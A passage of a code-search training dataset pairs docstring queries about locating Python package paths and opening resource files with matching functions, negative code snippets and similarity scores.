print(\"----------Model Parameters----------\")\n print(\"Initial Conv. Depth : \" + str(self.conv_depth))\n print(\"Number of Classes : \" + str(self.n_classes))\n print(\"Dropout : \" + str(self.dropout))\n print(\"Activation Function : Relu\")\n print(\"Input Shape : \" + str(self.input_shape))\n print(\"Batch Size : \" + str(self.batch_size))\n print(\"--------Optimizer Parameters--------\")\n print(\"Learning Rate : \" + str(self.optimizer.lr))\n print(\"Momentum : \" + str(self.optimizer.momentum))\n print(\"Initial Decay : \" + str(self.optimizer.initial_decay))", "def parameters(self):\n return self._default_params", "def show_params(self):\n \n return self.params[self.profile]" ]
[ "0.72978354", "0.72489446", "0.71823865", "0.71531653", "0.71393967", "0.70387006", "0.7021024", "0.69855696", "0.6905784", "0.68682903", "0.6830659", "0.6822782", "0.68215054", "0.6812191", "0.6792472", "0.67726594", "0.6756347", "0.6737905", "0.67369354", "0.67361426", "0.6695787", "0.66600984", "0.6657674", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6653527", "0.66096044", "0.66096044", "0.66096044", "0.66096044", "0.66096044", "0.65989953", "0.6582415", "0.65791243", "0.6571337", "0.6565985", "0.6565985", "0.656205", "0.654627", "0.6542246", "0.65418047", "0.6531596", "0.6527241", "0.6494951", "0.6482152", "0.6479929", "0.6479929", "0.6477382", "0.6477374", "0.6477374", "0.6477374", "0.6472181", "0.6461943", "0.6461773", "0.645946", "0.6453247", "0.6415906", "0.6415906", "0.64106804", "0.6404446", "0.63996017", "0.63995147", "0.6396234", "0.63924325", "0.63725203", "0.6361668", "0.6352167", "0.6352167", "0.6352167", "0.6348243", "0.63055444", "0.6304227", "0.6303975", "0.6297032", "0.6286121", "0.6280712", "0.62744766", "0.62708694", "0.6269244", "0.6267183", "0.62654835", "0.6243201", "0.6243201", "0.62371254", "0.62342006", "0.6232466", "0.6232466", "0.62319887", "0.6223981", "0.6223915", "0.62142223", "0.61867654", "0.6183377", "0.61819005" ]
0.67491484
17
Returns the path to a package or cwd if that cannot be found.
def _get_package_path(name): # 获取 模块包 路径, Flask() 中 引用 try: return os.path.abspath(os.path.dirname(sys.modules[name].__file__)) except (KeyError, AttributeError): return os.getcwd()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_package_path():\n package_name = get_package_name()\n return package_name.replace('.', '/')", "def get_package_dir():\n return Path(__file__).parent", "def get_packages_path_from_package(package):\n root = finder.get_package_root(package)\n\n if is_built_package(package):\n package_name_folder = os.path.dirname(root)\n\n return os.path.dirname(package_name_folder)\n\n return os.path.dirname(root)", "def find_package_path(path: Path) -> Optional[Path]:\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def get_package_root(package):\n path_to_package = package.resource.location\n\n if not os.path.isdir(path_to_package) and hasattr(package, \"filepath\"):\n return os.path.dirname(package.filepath)\n\n path = os.path.join(path_to_package, package.name, str(package.version))\n\n if not os.path.isdir(path):\n raise EnvironmentError(\n 'Package \"{package}\" has an invalid path \"{path}\".'\n \"\".format(package=package, path=path)\n )\n\n return path", "def package_path(pkg):\n fname = pkgutil.get_loader(pkg).get_filename()\n dirname = op.dirname(fname)\n dirname = op.abspath(op.join(dirname, '..'))\n return dirname", "def pypkgpath(self):\n pkgpath = None\n for parent in self.parts(reverse=True):\n if parent.isdir():\n if not parent.join(\"__init__.py\").exists():\n break\n if not isimportable(parent.basename):\n break\n pkgpath = parent\n return pkgpath", "def package_to_path(package):\n return package.replace('.','/')", "def sublime_haskell_package_path():\n return os.path.dirname(os.path.realpath(__file__))", "def get_pack_path():\r\n return get_package_path().replace(\"\\\\\", \"/\").replace(\"src\", \"\")", "def module_path() -> Path:\n if hasattr(sys, \"frozen\"):\n return Path(sys.executable).resolve().parent\n else:\n return (Path(__file__) / \"..\").resolve().parent", "def determine_python_path():\n if git_install_requested():\n projects_yaml = config('openstack-origin-git')\n projects_yaml = git_default_repos(projects_yaml)\n return os.path.join(git_pip_venv_dir(projects_yaml),\n 'lib/python2.7/site-packages')\n else:\n return None", "def cwd_in_path():\n ...", "def acquire_package_directory():\n top_plugin_dir = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n expected_package_dir = '/extras/MockApp'\n app_dir = top_plugin_dir + expected_package_dir\n return app_dir", "def package_dir(self):\r\n return \".\"", "def check_package_path(pkg):\n src_dir_root = ''\n print(\"[root-get] DEBUG: Checking package path\")\n check_package_name = os.system('find %s -maxdepth 1 -type d -name \"%s\" ! -path \"*tutorials*\" ! -path \"*dictpch*\"' % (ROOT_SOURCES, pkg))\n if check_package_name != 0:\n print(\"Not a ROOT package (we are working only with ROOT packages for now.)\")\n return False\n else:\n # if have such directory in root then we can try to get it's real path\n path = PathChecker()\n src_dir_root = path.path4pkg(pkg, ROOT_SOURCES)\n print(\"[root-get] We would use a package from {0:s}\".format(src_dir_root))\n return src_dir_root", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def _pkg_path(self, pkg):\n r = rospkg.RosPack()\n pkg_path = r.get_path(pkg) \n return pkg_path", "def _pkg_path(self, pkg):\n r = rospkg.RosPack()\n pkg_path = r.get_path(pkg) \n return pkg_path", "def get_package_init_path(self, pkgname, pkgdir):\n\n pkgdir = os.path.abspath(pkgdir)\n\n # Try __init__.py\n pkginitfile = os.path.join(pkgdir, '__init__.py')\n # If it does not exist, try <pkgname>.py\n if not os.path.isfile(pkginitfile):\n pkginitfile = os.path.join(pkgdir,pkgname + '.py')\n\n if os.path.isfile(pkginitfile):\n return pkginitfile\n else:\n # Everything failed, return pkgdir itself!\n return pkgdir", "def linkpath(srcdir, pkg):\n home = os.getenv('HOME')\n if srcdir:\n rval = '{}/{}'.format(srcdir, pkg)\n else:\n rval = '{}/bin/{}'.format(home, pkg)\n return rval", "def findPkgPath(self, pkg):\r\n try:\r\n return self._rp.get_path(pkg)\r\n except rospkg.ResourceNotFound:\r\n raise ResourceNotFound('Can not find ROS package '\r\n '\"{0}\".'.format(pkg))", "def get_path_from_package(package):\n if isinstance(package, str):\n pkg = package\n elif isinstance(package, _ModuleType):\n pkg = package.__package__\n else:\n raise ValueError('Invalid package type, must be str or module')\n dist = _pkg_resources.get_distribution(pkg)\n return dist.location, dist.version", "def get_package_path(ontology, parent, package):\n result = get_ontology_name(ontology)\n result += '.v'\n result += get_ontology_version(ontology)\n result += '.'\n result += get_package_name(parent)\n result += '.'\n result += get_package_name(package)\n return result", "def module_path():\r\n if hasattr(sys, \"frozen\"):\r\n return os.path.dirname(sys.executable)\r\n return os.path.dirname(__file__)", "def package_path(self, package_name):\n if not self.is_adb_available():\n return None\n\n _path = self._do_adb_command('shell pm path ' + package_name)\n if _path:\n try:\n _path = _path.join(_path.split()) # remove \\r\\n\n _path = _path.split(':')\n if len(_path) > 1 and _path[0] == 'package':\n ret = _path[1]\n if ret.endswith('apkpackage'):\n # handle new android packages\n ret = '/'.join(ret.split('/')[:-1])\n return ret\n except ValueError:\n pass\n\n return None", "def get_package_share_path(package_name, print_warning=True):\n path = pathlib.Path(get_package_share_directory(package_name, print_warning=False))\n if print_warning and not path.exists():\n warnings.warn(f'Share path for {package_name} ({path}) does not exist.', stacklevel=2)\n return path", "def get_path() -> str:\n return os.path.dirname(os.path.realpath(__file__))", "def find_package(import_name):\n root_mod_name = import_name.split('.')[0]\n loader = pkgutil.get_loader(root_mod_name)\n if loader is None or import_name == '__main__':\n # import name is not found, or interactive/main module\n package_path = os.getcwd()\n else:\n # For .egg, zipimporter does not have get_filename until Python 2.7.\n if hasattr(loader, 'get_filename'):\n filename = loader.get_filename(root_mod_name)\n elif hasattr(loader, 'archive'):\n # zipimporter's loader.archive points to the .egg or .zip\n # archive filename is dropped in call to dirname below.\n filename = loader.archive\n else:\n # At least one loader is missing both get_filename and archive:\n # Google App Engine's HardenedModulesHook\n #\n # Fall back to imports.\n __import__(import_name)\n filename = sys.modules[import_name].__file__\n package_path = os.path.abspath(os.path.dirname(filename))\n\n # In case the root module is a package we need to chop of the\n # rightmost part. This needs to go through a helper function\n # because of python 3.3 namespace packages.\n if _is_package(loader, root_mod_name):\n package_path = os.path.dirname(package_path)\n\n site_parent, site_folder = os.path.split(package_path)\n py_prefix = os.path.abspath(sys.prefix)\n if package_path.startswith(py_prefix):\n return py_prefix, package_path\n elif site_folder.lower() == 'site-packages':\n parent, folder = os.path.split(site_parent)\n # Windows like installations\n if folder.lower() == 'lib':\n base_dir = parent\n # UNIX like installations\n elif os.path.basename(parent).lower() == 'lib':\n base_dir = os.path.dirname(parent)\n else:\n base_dir = site_parent\n return base_dir, package_path\n return None, package_path", "def getPackagePath(self):\n return self._packagePath", "def _get_package_directory(self, package_name: str) -> str:\n return os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n '..', '..', 'assets', package_name, package_name,\n )\n )", "def which():\n\n location = None\n if os.path.basename(_git_path) != _git_path:\n if os.path.isfile(_git_path):\n location = _git_path\n else:\n paths = [x for x in os.environ[\"PATH\"].split(os.pathsep) if not x.isspace()]\n for path in paths:\n exe = os.path.join(path, _git_path)\n if os.path.isfile(exe):\n location = exe\n break\n return location", "def module_path():\n return os.path.dirname(unicode(__file__, sys.getfilesystemencoding( )))", "def get_python_package_entry_point(package, entry_point):\n site_packages_path = _dirname(_import_module(package).__path__[0])\n\n # Find package info\n # Can be a directory ending by \".dist-info\" or \".egg-info\"\n with _scandir(site_packages_path) as entries:\n for entry in entries:\n if (entry.name.startswith(f'{package}-') and\n _splitext(entry.name)[1] in ('.dist-info', '.egg-info')):\n package_info_path = entry.path\n break\n\n else:\n # Package is not installed or do not have package info\n return None\n\n # Find manifest file\n # Can be a \"RECORD\" or a \"installed-files.txt\" file in package info folder\n for name in ('RECORD', 'installed-files.txt'):\n manifest_path = _join(package_info_path, name)\n if _isfile(manifest_path):\n break\n\n else:\n # Package do not have manifest file\n return None\n\n # Find entry point relative path in manifest file\n # Possibles manifest file lines formats: \"path\\n\" or \"path,checksum\\n\"\n with open(manifest_path, 'rt') as manifest:\n\n for line in manifest:\n entry_point_rel_path = line.strip().split(',', 1)[0]\n if _basename(entry_point_rel_path) == entry_point:\n break\n\n else:\n # Entry point is not present in manifest\n return None\n\n # Convert to absolute path\n # Paths in manifest are relative to site-packages or package info\n for prefix in (site_packages_path, package_info_path):\n entry_point_path = _realpath(_join(prefix, entry_point_rel_path))\n\n if _isfile(entry_point_path):\n return entry_point_path", "def _get_module_path():\n\n return os.path.dirname(os.path.realpath(__file__))", "def repo_root() -> str:\n path = os.path.realpath(os.curdir)\n\n while True:\n if os.path.exists(os.path.join(path, \"setup.py\")):\n return path\n path = os.path.realpath(os.path.join(path, \"..\"))", "def locate_nuget():\n if NuGetRunner.valid_nuget_executable(\"nuget\"):\n return \"nuget\"\n return None", "def get_sp_dir(): # pragma: no cover\n for p in sys.path[::-1]:\n if p.endswith(\"site-packages\"):\n return p\n raise Exception(\"'site-package' directory not found!\")", "def module_path(self):\n return self.config['cwd']", "def _find_root() -> pathlib.Path:\n cwd = pathlib.Path.cwd()\n while not (\n pathlib.Path(cwd, \"pyproject.toml\").exists() or\n pathlib.Path(cwd, \"poetry.lock\").exists() or\n pathlib.Path(\"/\") == cwd\n ):\n cwd = cwd.parent\n return cwd", "def get_pip_path():\n\n return get_executable_path('pip')", "def _parent_path(pkg, pkg_path):\n parent = pkg_path[: -len(pkg)] if pkg_path.endswith(pkg) else pkg_path\n return parent.rstrip(\"/\" + os.sep)", "def app_package_path(self) -> str:\n return self._app_package_path", "def get_build_dir(package_dir):\n return os.path.split(makepkg([\"--packagelist\"], True, package_dir)[0])[0]", "def rel_cwd():\n return os.path.relpath(os.getcwd(), git_toplevel())", "def path(self):\n installed_packages_folder_path = site.getsitepackages()[0]\n return f'{installed_packages_folder_path}/{SITE_PACKAGES_FOLDER_NAME}'", "def find_locustfile(locustfile):\n # Obtain env value\n names = [locustfile]\n # Create .py version if necessary\n if not names[0].endswith('.py'):\n names += [names[0] + '.py']\n # Does the name contain path elements?\n if os.path.dirname(names[0]):\n # If so, expand home-directory markers and test for existence\n for name in names:\n expanded = os.path.expanduser(name)\n if os.path.exists(expanded):\n if name.endswith('.py') or _is_package(expanded):\n return os.path.abspath(expanded)\n else:\n # Otherwise, start in cwd and work downwards towards filesystem root\n path = os.path.abspath('.')\n while True:\n for name in names:\n joined = os.path.join(path, name)\n if os.path.exists(joined):\n if name.endswith('.py') or _is_package(joined):\n return os.path.abspath(joined)\n parent_path = os.path.dirname(path)\n if parent_path == path:\n # we've reached the root path which has been checked this iteration\n break\n path = parent_path", "def find_locustfile(locustfile):\n # Obtain env value\n names = [locustfile]\n # Create .py version if necessary\n if not names[0].endswith('.py'):\n names.append(names[0] + '.py')\n # Does the name contain path elements?\n if os.path.dirname(names[0]):\n # If so, expand home-directory markers and test for existence\n for name in names:\n expanded = os.path.expanduser(name)\n if os.path.exists(expanded):\n if name.endswith('.py') or _is_package(expanded):\n return os.path.abspath(expanded)\n else:\n # Otherwise, start in cwd and work downwards towards filesystem root\n path = os.path.abspath('.')\n while True:\n for name in names:\n joined = os.path.join(path, name)\n if os.path.exists(joined):\n if name.endswith('.py') or _is_package(joined):\n return os.path.abspath(joined)\n parent_path = os.path.dirname(path)\n if parent_path == path:\n # we've reached the root path which has been checked this iteration\n break\n path = parent_path\n # Implicit 'return None' if nothing was found", "def path(self):\n if not self._path:\n logger.spam(\"Checking for helper executable %s\", self.name)\n self._path = distutils.spawn.find_executable(self.name)\n if self._path:\n logger.debug(\"%s is at %s\", self.name, self.path)\n self._installed = True\n else:\n logger.debug(\"No path to %s found\", self.name)\n return self._path", "def find_resource_dir(self, dock_image: str, meta: dict) -> str:\n try:\n return self.interrogate_python_package_location(dock_image, meta)\n except CalledProcessError:\n return ''", "def _get_package_dir(self, package, component):\n return join('pool', component, Repository.get_pool(package), package)", "def find_setup_dir():\n dirname = os.path.dirname(__file__)\n if \"/site-packages/\" in dirname:\n prefix = dirname[:dirname.index(\"/site-packages/\")]\n for suffix in [\"share/openchange/setup\", \"share/setup\", \"share/samba/setup\", \"setup\"]:\n ret = os.path.join(prefix, suffix)\n if os.path.isdir(ret):\n return ret\n # In source tree\n ret = os.path.join(dirname, \"../../setup\")\n if os.path.isdir(ret):\n return ret\n raise Exception(\"Unable to find setup directory.\")", "def name(self):\n\n if self.package:\n directory = self.package.directory\n if self.package.resolve_root:\n directory = directory.joinpath(self.package.resolve_root)\n rel = None\n try:\n rel = self.filename.with_suffix('').relative_to(directory)\n except ValueError as e:\n if self.package.resolve_root:\n # Possibly this module is required from a directory outside of\n # the package's resolve_root, and Path.relative_to() will raise a\n # ValueError if the file is not inside the specified directory.\n try:\n rel = type(self.filename)(os.path.relpath(str(self.filename.with_suffix('')), str(directory)))\n except ValueError as e:\n pass # On a different drive\n pass\n if rel:\n parts = filter(bool, utils.path.lparts(rel))\n return self.package.name + '/' + '/'.join(parts)\n\n return self.filename.stem", "def get_path():\n return path.abspath(path.dirname(path.dirname(__file__)))", "def _package_root(name):\n return name.split('.', 1)[0]", "def package_folder(self):\n return self._base_package", "def path(src, name='default'):\n try:\n return get_output(['hg', 'path', name], cwd=src).strip()\n except subprocess.CalledProcessError:\n return None", "def module_path():\n try:\n this_file_path = __file__\n except NameError:\n # inside an interpreter, we can use the stack to find the file\n # path.\n tbs = traceback.extract_stack()\n this_file_path = tbs[0][0]\n # move back up to rfm directory\n dev_root = os.path.dirname(this_file_path)\n\n return dev_root", "def srcdir(path):\n if not workflow.included_stack:\n return None\n return workflow.current_basedir.join(path).get_path_or_uri()", "def getcwd():\n cwd = os.getcwd()\n # os.getcwd works properly with Python 3 on Windows.\n # We need this workaround only for Python 2 on Windows.\n if is_win and is_py2:\n try:\n unicode(cwd)\n except UnicodeDecodeError:\n # Do conversion to ShortPathName really only in case 'cwd' is not\n # ascii only - conversion to unicode type cause this unicode error.\n try:\n import win32api\n cwd = win32api.GetShortPathName(cwd)\n except ImportError:\n pass\n return cwd", "def package_source_space(self, package):\n for pkg_name, pkg in self.packages:\n if pkg_name == package.name:\n pkg_dir = os.path.dirname(pkg.filename)\n # Need to check if the pkg_dir is the source space as it can also be loaded from the metadata\n if os.path.commonpath([self.source_space_abs, pkg_dir]) == self.source_space_abs:\n return pkg_dir\n\n return None", "def get_target_folder() -> str:\n return os.path.abspath(os.path.join(dirname(__file__), os.pardir, os.pardir, \"provider_packages\"))", "def getPackageName(rootDir=\"python\"):\n dirIter = os.walk(rootDir)\n (dirPath, dirList, fileList) = next(dirIter)\n dirList = [dirName for dirName in dirList if not dirName.startswith(\".\")]\n if len(dirList) != 1:\n raise RuntimeError(\"Found %s instead of 1 directory\" % (dirList,))\n return dirList[0]", "def get_cwd():\n return os.getcwd()", "def get_deps_path(root):\n app_root = os.path.join(root, DEPS_PATTERN)\n files = glob.glob(app_root)\n if len(files) != 1:\n return None\n return files[0]", "def __get_module_root_dir(self):\n # type: () -> str\n if self.location in ['.', '.' + os.sep]:\n return self.env_root\n if self.source != 'local':\n return self.__fetch_remote_source()\n return os.path.join(self.env_root, self.location)", "def get_source_package_path(provider_package_id: str) -> str:\n return os.path.join(PROVIDERS_PATH, *provider_package_id.split(\".\"))", "def get_python_path():\n\n return get_executable_path('python')", "def get_proj_dir(path: Union[pathlib.PurePath, str] = __file__) -> str:\n return str(pathlib.Path(path).parent.absolute())", "def get_package_share_directory(package_name, print_warning=True):\n path = os.path.join(get_package_prefix(package_name), 'share', package_name)\n if print_warning and not os.path.exists(path):\n warnings.warn(f'Share directory for {package_name} ({path}) does not exist.', stacklevel=2)\n return path", "def get_project_source_dir() -> Path:\n return Path(__file__).resolve().parents[1].resolve()", "def root_dir():\r\n return Path(__file__).parent.parent", "def get_project_root() -> pl.Path:\n return pl.Path(__file__).parent.parent", "def _find_project_by_import():\n try:\n import _databand_project\n\n return abs_join(_databand_project.__file__, \"..\")\n except ImportError:\n dbnd_log_init_msg(\"Can't import `_databand_project` marker.\")\n return None", "def get_cur_directory(file_name: str=__file__) -> str:\n if hasattr(sys, 'frozen') and sys.frozen:\n path, filename = os.path.split(sys.executable)\n directory = path\n else:\n directory = os.path.dirname(os.path.realpath(file_name))\n return directory", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def package_dest_path(self, package):\n\n if self.destdir is None:\n return self.package_final_path(package)\n else:\n return os.path.join(\n self.destdir,\n self.package_install_space(package).lstrip(os.sep))", "def package_metadata_path(self, package=None):\n profile_path, _ = metadata.get_paths(self.workspace, self.profile)\n if package is None:\n return os.path.join(profile_path, 'packages')\n return os.path.join(profile_path, 'packages', package.name)", "def path_for_import(name):\n return os.path.dirname(os.path.abspath(import_module(name).__file__))", "def module_path():\n from sys import path\n from os import getcwd\n from os.path import basename,exists\n from inspect import getmodulename,getfile\n from logging import warn\n # 'getfile' retreives the source file name name compiled into the .pyc file.\n pathname = getfile(lambda x: None)\n if exists(pathname): return pathname\n # The module might have been compiled on a different machine or in a\n # different directory.\n pathname = pathname.replace(\"\\\\\",\"/\")\n filename = basename(pathname)\n dirs = [dir for dir in [getcwd()]+path if exists(dir+\"/\"+filename)]\n if len(dirs) == 0: warn(\"pathname of file %r not found\" % filename)\n dir = dirs[0] if len(dirs) > 0 else \".\"\n pathname = dir+\"/\"+filename\n return pathname", "def get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def menpowidgets_src_dir_path():\n # to avoid cluttering the menpowidgets.base namespace\n from pathlib import Path\n import os.path\n\n return Path(os.path.abspath(__file__)).parent", "def get_module_path(module):\n return pathlib.Path(os.path.dirname(os.path.abspath(inspect.getfile(module))))", "def _package_name(root_path, path):\n if not _under(path, root_path):\n raise ValueError('\"%s\" is not a subpath of \"%s\"' % (path, root_path))\n return path[len(root_path) + 1:].replace(os.sep, '.')", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def cwd_for_path(self, path):\n os_path = to_os_path(path, self.root_dir)\n # in the case of notebooks and kernels not being on the same filesystem,\n # walk up to root_dir if the paths don't exist\n while not os.path.isdir(os_path) and os_path != self.root_dir:\n os_path = os.path.dirname(os_path)\n return os_path", "def get_project_root():\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def _default_target(package):\n return package[package.rfind('/')+1:]", "def from_cwd(root, path):\n return normpath(join(root, normpath(path)))", "def get_kernel_path():\n path = \"/\".join(os.path.dirname(os.path.realpath(__file__)).split('/')[:-1])\n return path+'/src/'", "def module_directory(file_path):\n return os.path.dirname(os.path.realpath(file_path))", "def get_package_list_filepath(*args, **kwargs):\n logger.debug(\"Getting the package file filepath\")\n user = path.expanduser(\"~\")\n filepath = f\"{user}/.gitget.yaml\"\n logger.debug(\"Filepath found\")\n return filepath", "def _find_reporoot(self, reporoot_opt, relnotessubdir_opt):\n reporoot = os.path.abspath(reporoot_opt)\n # When building on RTD.org the root directory may not be\n # the current directory, so look for it.\n try:\n return repo.Repo.discover(reporoot).path\n except Exception:\n pass\n\n for root in ('.', '..', '../..'):\n if os.path.exists(os.path.join(root, relnotessubdir_opt)):\n return root\n\n raise Exception(\n 'Could not discover root directory; tried: %s' % ', '.join([\n os.path.abspath(root) for root in ('.', '..', '../..')\n ])\n )", "def path():\n # Exclude path to this script from path.\n this_file = os.path.realpath(__file__)\n this_path = os.path.dirname(this_file)\n return os.pathsep.join(p for p in sys.path if p != this_path)" ]
[ "0.7696517", "0.7690331", "0.74621767", "0.7385542", "0.735868", "0.7233731", "0.7224455", "0.68511313", "0.6845975", "0.6718231", "0.66957945", "0.6695532", "0.66928047", "0.6686478", "0.66783273", "0.65905523", "0.6572487", "0.6560498", "0.6526827", "0.6526827", "0.6525203", "0.65170616", "0.6510319", "0.6487505", "0.648562", "0.64829934", "0.64775175", "0.64556175", "0.64322776", "0.6381957", "0.63780195", "0.6335252", "0.6333008", "0.63011646", "0.6300961", "0.6298814", "0.6293719", "0.6278339", "0.62765765", "0.6273744", "0.62718314", "0.62627965", "0.62395483", "0.62352", "0.62332356", "0.6225714", "0.62240404", "0.6195693", "0.6185059", "0.6177714", "0.6148088", "0.6137461", "0.6134477", "0.6132164", "0.6131857", "0.61088246", "0.61063015", "0.6105787", "0.6095807", "0.6092792", "0.608952", "0.60860425", "0.60587615", "0.60545486", "0.60382974", "0.600438", "0.5999292", "0.59979856", "0.59859246", "0.59421027", "0.59337723", "0.593262", "0.5930776", "0.59291756", "0.5919531", "0.5918613", "0.5901341", "0.5892536", "0.58823645", "0.58763677", "0.5872903", "0.58725756", "0.5870687", "0.58701676", "0.5858995", "0.58476835", "0.58476835", "0.58415174", "0.5839047", "0.5837748", "0.5837748", "0.5837748", "0.5837748", "0.58343273", "0.5829569", "0.5825423", "0.5823092", "0.58229464", "0.5822014", "0.5819711" ]
0.7207799
7
Opens a resource from the application's resource folder. To see
def open_resource(self, resource): if pkg_resources is None: return open(os.path.join(self.root_path, resource), 'rb') return pkg_resources.resource_stream(self.package_name, resource)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def open_resource(self, filename):\n assert self.current_run is not None, \"Can only be called during a run.\"\n return self.current_run.open_resource(filename)", "def getResource(self, file_name):\n path = os.path.join(os.path.dirname(__file__), \"resource\", file_name)\n return open(path)", "def open_resource(self, resource):\n # type: (Text) -> BinaryIO\n # This deliberately raises FileNotFoundError instead of\n # NotImplementedError so that if this method is accidentally called,\n # it'll still do the right thing.\n raise FileNotFoundError", "def load_resources(resource_filename):", "def get_resource_path():\n return os.path.join(os.path.dirname(__file__), \"resources\") + os.path.sep", "def load_resource(resource):\n if resource not in RES_PATHS:\n raise Exception(f\"Unknown resource: {resource}\")\n\n with open(RES_PATHS[resource], 'r', encoding='utf8') as f:\n data = json.load(f)\n\n return data", "def getResource(resname, loc = None):\n # check the HOME for personal config file\n prv_filename = os.path.join(os.getenv(\"HOME\"), \".aphla\", resname)\n if os.path.exists(prv_filename):\n return prv_filename\n elif loc and resource_exists(loc, resname):\n # use the config within distribution\n return resource_filename(loc, resname)\n else:\n return None", "def open_error_resource():\n need('Estr', 1, filename=\"errors.rsrc\", modname=__name__)", "def load_resource(resource_path): # pragma: NO COVER\n resource_content = pkg_resources.resource_string(__name__, resource_path)\n return resource_content.decode(\"utf8\")", "def load_resource(path: str, encoding: str = None) -> TextIO:\n components = path.rsplit(\":\", 1)\n try:\n if len(components) == 1:\n return open(components[0], encoding=encoding)\n else:\n bstream = pkg_resources.resource_stream(components[0], components[1])\n if encoding:\n return TextIOWrapper(bstream, encoding=encoding)\n return bstream\n except IOError:\n pass", "def load_resource(self, resource_path):\n resource_content = pkg_resources.resource_string(__name__, resource_path)\n return resource_content.decode(\"utf8\")", "def resource(self, *path):\n # TODO(vadimsh): Verify that file exists. Including a case like:\n # module.resource('dir').join('subdir', 'file.py')\n return self._module.RESOURCE_DIRECTORY.join(*path)", "def open_pathname(pathname, verbose=0):\n try:\n refno = Res.FSpOpenResFile(pathname, 1)\n except Res.Error, arg:\n if arg[0] in (-37, -39):\n # No resource fork. We may be on OSX, and this may be either\n # a data-fork based resource file or a AppleSingle file\n # from the CVS repository.\n try:\n refno = Res.FSOpenResourceFile(pathname, u'', 1)\n except Res.Error, arg:\n if arg[0] != -199:\n # -199 is \"bad resource map\"\n raise\n else:\n return refno\n # Finally try decoding an AppleSingle file\n pathname = _decode(pathname, verbose=verbose)\n refno = Res.FSOpenResourceFile(pathname, u'', 1)\n else:\n raise\n return refno", "def _resource(path): # pragma: NO COVER\n data = pkg_resources.resource_string(__name__, path)\n return data.decode(\"utf8\")", "def load_resource(self, path):\n data = pkg_resources.resource_string(__name__, path)\n return data.decode(\"utf8\")", "def resource_path(name):\n return os.path.join(\n os.path.dirname(__file__), 'images', 'resource', name)", "def load_resource(resource_path): # pragma: NO COVER\n resource_content = pkg_resources.resource_string(__name__, resource_path)\n return unicode(resource_content)", "def open(self):\n if System.is_linux():\n subprocess.run([\"xdg-open\", self.__path])\n elif System.is_mac():\n subprocess.run([\"open\", self.__path])\n elif System.is_windows():\n if self.__len_prefix:\n from pysaurus.core.native.windows import get_short_path_name\n\n path = get_short_path_name(self.standard_path)\n if path is None:\n raise core_exceptions.NoShortPathError(self.__path)\n logger.debug(f\"AbsolutePath: opening Windows short path {path}\")\n else:\n path = self.__path\n FileSystem.startfile(path)\n else:\n raise core_exceptions.UnsupportedSystemError(System.platform())\n return self", "def read_file(rel_path, *args, **kwargs):\n path = os.path.join(os.path.dirname(__file__), \"resources\", rel_path)\n with open(path, *args, **kwargs) as _file:\n return _file.read()", "def OpenReadMe():\n\tos.startfile(ReadMeFile)\n\treturn", "def get_resource(resource_path):\n\n return pkg_resources.resource_string(\n cloudify_agent.__name__,\n os.path.join('resources', resource_path)\n )", "def resources(filename):\n return send_from_directory(\"resources\", filename)", "def resource(request):\n local_path = os.path.dirname(request.module.__file__)\n return lambda *args: get_resource_path(args, local_path)", "def open( self ):\n pass", "def resource_pathname(pathname, verbose=0):\n try:\n refno = Res.FSpOpenResFile(pathname, 1)\n Res.CloseResFile(refno)\n except Res.Error, arg:\n if arg[0] in (-37, -39):\n # No resource fork. We may be on OSX, and this may be either\n # a data-fork based resource file or a AppleSingle file\n # from the CVS repository.\n try:\n refno = Res.FSOpenResourceFile(pathname, u'', 1)\n except Res.Error, arg:\n if arg[0] != -199:\n # -199 is \"bad resource map\"\n raise\n else:\n return refno\n # Finally try decoding an AppleSingle file\n pathname = _decode(pathname, verbose=verbose)\n else:\n raise\n return pathname", "def get_resource(res_name, res_type=\"icons\"):\n own_path = os.path.dirname(__file__)\n resource_path = os.path.abspath(os.path.join(own_path, os.pardir, \"resources\", res_type))\n return os.path.join(resource_path, res_name)", "def open_file(self, relpath, mode):\n path = os.path.join(self.topdir, relpath)\n try:\n return open(path, mode)\n except IOError as error:\n if error.errno == errno.ENOENT:\n raise PathNotFoundError(path)\n raise", "def open(self) -> None:", "def open(self) -> None:", "def open(self) -> None:", "def open_program(path):\r\n os.startfile(path)", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def get_resource(self):\n from rowgenerators import parse_app_url # Here, to break an import cycle\n\n self._resource = self._downloader.download(self.inner)\n\n\n ru = parse_app_url(self._resource.sys_path,\n downloader=self.downloader,\n scheme_extension=self.scheme_extension,\n **self.frag_dict)\n\n\n return ru", "def _open(args):\n p = Path(args.uri)\n if p.is_file():\n uri = p.resolve().as_uri()\n else:\n # hope the user has provided a valid URI\n uri = args.uri\n\n print(f'opening {uri}')\n args.service.open(uri)", "def load(filename):\n path = Path(__file__).parent / \"resources\" / filename\n with path.open() as file:\n return lkml.load(file)", "def getResource(self):\n pass;", "def open_file(self):\n try:\n filename = tkFileDialog.askopenfilename()\n file = open(filename)\n self.image_window.status.config(text='Opened: ' + filename)\n return file\n except:\n self.status.config(text='You fool!')\n tkMessageBox.showwarning(\"Open file\",\n \"Cannot open file \" + filename)\n return None", "def _localfile(name):\n return os.path.abspath(resource_filename(__name__, name))", "def open(self):\r\n pass", "def open(self):\r\n pass", "def get_resource(filename: str, path: str | None = None) -> str:\n root = Path(__file__).parent\n full_path = root if path is None else root / Path(path)\n return str(full_path / filename)", "def 